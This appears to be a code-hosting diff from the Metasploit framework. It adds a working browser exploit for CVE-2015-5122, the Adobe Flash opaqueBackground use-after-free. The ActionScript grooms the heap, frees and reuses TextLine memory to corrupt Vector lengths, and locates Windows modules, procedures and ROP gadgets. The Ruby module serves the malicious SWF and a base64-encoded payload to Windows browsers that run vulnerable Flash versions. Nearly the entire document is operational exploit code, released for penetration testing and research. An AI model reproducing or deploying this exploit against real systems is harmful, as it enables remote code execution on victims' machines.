import flash.utils.ByteArray;
|
||||
import flash.system.Capabilities;
|
||||
import flash.events.MouseEvent;
|
||||
import flash.external.ExternalInterface;
|
||||
import flash.text.*;
|
||||
import flash.text.*;
|
||||
import flash.text.engine.*;
|
||||
|
||||
public class MyClass
|
||||
{
|
||||
static var
|
||||
_gc:Array,
|
||||
_ar:Array,
|
||||
_arLen1:int,
|
||||
_arLen2:int,
|
||||
_arLen:int,
|
||||
_vu:Vector.<uint>,
|
||||
_vo:Vector.<Object>,
|
||||
_tb:TextBlock,
|
||||
_tl:TextLine,
|
||||
_mc:MyClass,
|
||||
_is64 = null,
|
||||
_chrome:Boolean,
|
||||
_done:Boolean,
|
||||
_cnt:int,
|
||||
_vLen:int,
|
||||
_magic:uint = 0x123456,
|
||||
LEN40:uint = 0x40000000;
|
||||
|
||||
static function valueOf2()
|
||||
{
|
||||
try
|
||||
{
|
||||
if (++_cnt < _arLen2) {
|
||||
// recursive call for next TextLine
|
||||
_ar[_cnt].opaqueBackground = _mc;
|
||||
} else {
|
||||
Logger.log("MyClass.valueOf2()");
|
||||
|
||||
// free internal objects
|
||||
for(var i:int=1; i <= 5; i++)
|
||||
_tb.recreateTextLine(_ar[_arLen2-i]);
|
||||
|
||||
// reuse freed memory
|
||||
for(i=_arLen2; i < _arLen; i++)
|
||||
_ar[i].length = _vLen;
|
||||
}
|
||||
}
|
||||
catch (e:Error)
|
||||
{
|
||||
Logger.log("valueOf2 " + e.toString());
|
||||
}
|
||||
return _vLen+8;
|
||||
}
|
||||
|
||||
static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray)
|
||||
{
|
||||
try
|
||||
{
|
||||
// init vars
|
||||
Logger.log("init vars")
|
||||
_arLen1 = 10 * 3; // 10 vectors per page
|
||||
_arLen2 = _arLen1 + 4 * 4; // 4 TextLine per page
|
||||
_arLen = _arLen2 + 10 * 8;
|
||||
_ar = new Array(_arLen);
|
||||
if (!_gc) _gc = new Array();
|
||||
_gc.push(_ar);
|
||||
if (!_tb) {
|
||||
_tb = new TextBlock(new TextElement("TextElement", new ElementFormat()));
|
||||
if (!_tb) throw new Error("_tb = " + _tb);
|
||||
}
|
||||
_mc = new MyClass();
|
||||
_vLen = 400/4-2;
|
||||
|
||||
// fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)
|
||||
Logger.log("fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)")
|
||||
for(var i:int; i < _arLen1; i++)
|
||||
_ar[i] = new Vector.<uint>(_vLen);
|
||||
|
||||
// prepare Vector objects
|
||||
Logger.log("prepare Vector objects")
|
||||
for(i=_arLen2; i < _arLen; i++){
|
||||
_ar[i] = new Vector.<uint>(8);
|
||||
_ar[i][0] = i;
|
||||
}
|
||||
|
||||
// prepare TextLines
|
||||
Logger.log("prepare TextLines")
|
||||
for(i=_arLen1; i < _arLen2; i++)
|
||||
_ar[i] = _tb.createTextLine();
|
||||
// fill 1016-byte holes (0x38c is a size of internal TextLine object)
|
||||
Logger.log("fill 1016-byte holes (0x38c is a size of internal TextLine object)")
|
||||
for(i=_arLen1; i < _arLen2; i++)
|
||||
_ar[i].opaqueBackground = 1; // alloc 1016 bytes
|
||||
|
||||
// set custom valueOf() for _mc
|
||||
Logger.log("set custom valueOf() for _mc")
|
||||
MyClass.prototype.valueOf = valueOf2;
|
||||
|
||||
// here we go, call the vulnerable setter
|
||||
Logger.log("here we go, call the vulnerable setter")
|
||||
_cnt = _arLen2-6;
|
||||
_ar[_cnt].opaqueBackground = _mc;
|
||||
|
||||
// find corrupted vector length
|
||||
Logger.log("find corrupted vector length ")
|
||||
for(i=_arLen2; i < _arLen; i++) {
|
||||
_vu = _ar[i];
|
||||
if (_vu.length > _vLen+2) {
|
||||
Logger.log("ar["+i.toString()+"].length = " + _vu.length.toString(16));
|
||||
Logger.log("ar["+i.toString()+"]["+_vLen.toString(16)+"] = " + _vu[_vLen].toString(16));
|
||||
if (_vu[_vLen] == _vLen) {
|
||||
// corrupt next vector
|
||||
_vu[_vLen] = LEN40;
|
||||
// get corrupted vector
|
||||
_vu = _ar[_vu[_vLen+2]];
|
||||
break;
|
||||
}
|
||||
};// else CheckCorrupted(_vu, i); // 4RnD
|
||||
}
|
||||
|
||||
// check results
|
||||
Logger.log("v.length = " + _vu.length.toString(16));
|
||||
if (_vu.length < LEN40) throw new Error("try again");
|
||||
|
||||
var exploiter:Exploiter = new Exploiter(e, platform, os, payload, _vu, 0x62)
|
||||
|
||||
// clean up
|
||||
Logger.log("_vu.length = " + _vu.length.toString(16));
|
||||
}
|
||||
catch (e:Error)
|
||||
{
|
||||
Logger.log("TryExpl " + e.toString());
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
}
|
|
@ -0,0 +1,72 @@
|
|||
package
|
||||
{
|
||||
public class PE
|
||||
{
|
||||
private var eba:ExploitByteArray
|
||||
|
||||
public function PE(ba:ExploitByteArray)
|
||||
{
|
||||
eba = ba
|
||||
}
|
||||
|
||||
public function base(addr:uint):uint
|
||||
{
|
||||
addr &= 0xffff0000
|
||||
while (true) {
|
||||
if (eba.read(addr) == 0x00905a4d) return addr
|
||||
addr -= 0x10000
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
public function module(name:String, addr:uint):uint
|
||||
{
|
||||
var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
|
||||
var mod_name:String
|
||||
|
||||
while (true) {
|
||||
var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
|
||||
if (!entry) throw new Error("FAIL!");
|
||||
mod_name = eba.read_string(addr + entry, name.length)
|
||||
if (mod_name.toUpperCase() == name.toUpperCase()) break
|
||||
}
|
||||
return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
|
||||
}
|
||||
|
||||
public function procedure(name:String, addr:uint):uint
|
||||
{
|
||||
var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
|
||||
var numberOfNames:uint = eba.read(eat + 0x18)
|
||||
var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
|
||||
var addressOfNames:uint = addr + eba.read(eat + 0x20)
|
||||
var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
|
||||
var proc_name:String
|
||||
|
||||
for (var i:uint = 0; ; i++) {
|
||||
var entry:uint = eba.read(addressOfNames + i * 4)
|
||||
proc_name = eba.read_string(addr + entry, name.length + 2)
|
||||
if (proc_name.toUpperCase() == name.toUpperCase()) break
|
||||
}
|
||||
return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
|
||||
}
|
||||
|
||||
public function gadget(gadget:String, hint:uint, addr:uint):uint
|
||||
{
|
||||
var find:uint = 0
|
||||
var contents:uint = 0
|
||||
var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
|
||||
var value:uint = parseInt(gadget, 16)
|
||||
|
||||
for (var i:uint = 0; i < limit - 4; i++) {
|
||||
contents = eba.read(addr + i)
|
||||
if (hint == 0xffffffff && value == contents) {
|
||||
return addr + i
|
||||
}
|
||||
if (hint != 0xffffffff && value == (contents & hint)) {
|
||||
return addr + i
|
||||
}
|
||||
}
|
||||
throw new Error()
|
||||
}
|
||||
}
|
||||
}
|
|
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_request_exploit(cli, request, target_info)
|
||||
print_status("Request: #{request.uri}")
|
||||
|
||||
if target_info[:os_name] == OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
|
||||
if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
|
||||
print_warning("Target setup not supported")
|
||||
send_not_found(cli)
|
||||
return
|
||||
|
|
|
@ -0,0 +1,144 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe Flash opaqueBackground Use After Free',
|
||||
'Description' => %q{
|
||||
This module exploits an use after free on Adobe Flash Player. The vulnerability,
|
||||
discovered by Hacking Team and made public on its July 2015 data leak, was
|
||||
described as an Use After Free while handling the opaqueBackground property
|
||||
7 setter of the flash.display.DisplayObject class. This module is an early release
|
||||
tested on:
|
||||
|
||||
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,
|
||||
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
|
||||
Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203,
|
||||
Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194,
|
||||
windows 8.1, Firefox and Adobe Flash 18.0.0.203,
|
||||
Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and
|
||||
Windows 8.1, Firefox and Adobe Flash 18.0.0.194
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', # Vulnerability discovered on HackingTeam info leak
|
||||
'juan vazquez', # Ported to Msf
|
||||
'sinn3r' # Testing and some editing
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2015-5122'],
|
||||
['URL', 'https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => ['win'],
|
||||
'Arch' => [ARCH_X86],
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
:source => /script|headers/i,
|
||||
:arch => ARCH_X86,
|
||||
:os_name => lambda do |os|
|
||||
os =~ OperatingSystems::Match::WINDOWS_7 ||
|
||||
os =~ OperatingSystems::Match::WINDOWS_81
|
||||
end,
|
||||
:ua_name => lambda do |ua|
|
||||
case target.name
|
||||
when 'Windows'
|
||||
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
|
||||
end
|
||||
|
||||
false
|
||||
end,
|
||||
:flash => lambda do |ver|
|
||||
case target.name
|
||||
when 'Windows'
|
||||
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.203')
|
||||
end
|
||||
|
||||
false
|
||||
end
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows',
|
||||
{
|
||||
'Platform' => 'win'
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Jul 06 2015',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
@swf = create_swf
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
def on_request_exploit(cli, request, target_info)
|
||||
print_status("Request: #{request.uri}")
|
||||
|
||||
if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
|
||||
print_warning("Target setup not supported")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri =~ /\.swf$/
|
||||
print_status('Sending SWF...')
|
||||
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
|
||||
return
|
||||
end
|
||||
|
||||
print_status('Sending HTML...')
|
||||
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
|
||||
end
|
||||
|
||||
def exploit_template(cli, target_info)
|
||||
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
|
||||
target_payload = get_payload(cli, target_info)
|
||||
b64_payload = Rex::Text.encode_base64(target_payload)
|
||||
os_name = target_info[:os_name]
|
||||
|
||||
if target.name =~ /Windows/
|
||||
platform_id = 'win'
|
||||
end
|
||||
|
||||
html_template = %Q|<html>
|
||||
<body>
|
||||
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
|
||||
<param name="movie" value="<%=swf_random%>" />
|
||||
<param name="allowScriptAccess" value="always" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
|
||||
<param name="Play" value="true" />
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
|
||||
</object>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
return html_template, binding()
|
||||
end
|
||||
|
||||
def create_swf
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5122', 'msf.swf')
|
||||
swf = ::File.open(path, 'rb') { |f| swf = f.read }
|
||||
|
||||
swf
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue